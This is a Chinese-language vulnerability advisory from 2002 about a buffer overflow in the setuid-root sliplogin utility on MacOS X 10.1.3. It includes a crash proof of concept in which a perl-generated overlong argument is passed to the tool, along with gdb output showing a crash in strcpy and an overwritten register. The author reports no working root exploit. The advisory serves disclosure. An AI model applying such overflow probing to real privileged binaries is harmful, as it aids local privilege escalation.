MacOS X Sliplogin存在缓冲溢出漏洞发布时间:2002-05-21 更新时间:2002-05-21 严重程度:高 威胁程度:本地管理员权限 错误类型:边界检查错误 利用方式:服务器模式 BUGTRAQ ID:4769 受影响系统 Apple MacOS X 10.1.3详细描述 sliplogin是MacOS X的工具之一,其中传递sliplogin超长的参数可导致出现缓冲溢出。 由于此工具设置为SETUID ROOT属性,可导致利用缓冲溢出获得ROOT权限。 测试代码 Osx version 10.1.3 [localhost:~] elguapo% ls -al /usr/sbin/sliplogin -r-sr-xr-x 1 root wheel 14700 Dec 8 10:49 /usr/sbin/sliplogin [localhost:~] elguapo% sliplogin `perl -e 'print "A" x 9000'` Bus error [localhost:~] elguapo% uname -a Darwin localhost 5.3 Darwin Kernel Version 5.3: Thu Jan 24 22:06:02 PST 2002; root:xnu/xnu-201.19.obj~1/RELEASE_PPC Power Macintosh powerpc [localhost:~] elguapo% id uid=501(elguapo) gid=20(staff) groups=20(staff), 0(wheel), 80(admin) [localhost:~] elguapo% ls -al /usr/sbin/sliplogin -r-sr-xr-x 1 root wheel 14700 Dec 8 10:49 /usr/sbin/sliplogin [localhost:~] elguapo% gdb /usr/sbin/sliplogin GNU gdb 5.0-20001113 (Apple version gdb-203) (Wed Nov 7 16:28:57 GMT 2001) (UI_OUT) Copyright 2000 Free Software Foundation, Inc. GDB is free software, covered by the GNU General Public License, and you are welcome to change it and/or distribute copies of it under certain conditions. Type "show copying" to see the conditions. There is absolutely no warranty for GDB. Type "show warranty" for details. This GDB was configured as "powerpc-apple-macos10". Reading symbols for shared libraries .. done (gdb) r `perl -e 'print "A" x 1476'` Starting program: /usr/sbin/sliplogin `perl -e 'print "A" x 1477'` [Switching to thread 1 (process 339 thread 0x1603)] Program received signal EXC_BAD_ACCESS, Could not access memory. 0x70004c88 in strcpy () (gdb) bt #0 0x70004c88 in strcpy () #1 0x00001bd4 in ?? () #2 0x00002278 in ?? () #3 0x00001af4 in ?? () #4 0x00001924 in ?? () I have not been able to accomplish anything short of overwriting r0 with 41. If the sc command gets called you could control the next syscall by changing the value in r0. I personally can do nothing with it... (gdb) r `perl -e 'print "A" x 1478'` The program being debugged has been started already. Start it from the beginning? (y or n) y Starting program: /usr/sbin/sliplogin `perl -e 'print "A" x 1478'` [Switching to thread 1 (process 351 thread 0x1c07)] Program received signal EXC_BAD_ACCESS, Could not access memory. 0x70004c88 in strcpy () (gdb) i r r0 0x41 65 解决方案 尚无 相关信息 Kevin Finisterre 参考:http://www.securitytracker.com/alerts/2002/May/1004317.html |
